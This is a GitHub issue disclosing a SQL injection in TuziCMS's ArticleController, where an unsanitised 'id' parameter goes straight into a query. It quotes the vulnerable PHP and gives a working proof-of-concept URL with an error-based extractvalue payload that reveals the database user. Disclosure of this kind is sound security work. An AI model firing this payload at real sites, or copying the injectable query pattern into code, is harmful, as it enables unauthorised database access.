Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

#

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Jump to bottom

App\Manage\Controller\ArticleController.class.php has SQLinject #12

Open
f4cky0u opened this issue Jan 12, 2023 · 1 comment
Open

App\Manage\Controller\ArticleController.class.php has SQLinject #12

f4cky0u opened this issue Jan 12, 2023 · 1 comment

Comments

@f4cky0u
Copy link

f4cky0u commented Jan 12, 2023
edited
Loading

\App\Manage\Controller\ArticleController.class.php
line: 18 - 22
public function index(){
C('TOKEN_ON',false);//关闭表单令牌
//查询指定id的栏目信息
$id=I('get.id');//类别ID
$topcate=M('Column')->where("id=$id")->order('column_sort')->select();
dump($topcate);
exit;
POC:http://127.0.0.1/tuzicms/index.php/Manage/Article/index/id/1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))

34861673494776_ pic
34871673494829_ pic
@yeyinshi
Copy link
Owner

yeyinshi commented Jan 12, 2023 via email

# for free to join this conversation on GitHub. Already have an account? # to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@yeyinshi @f4cky0u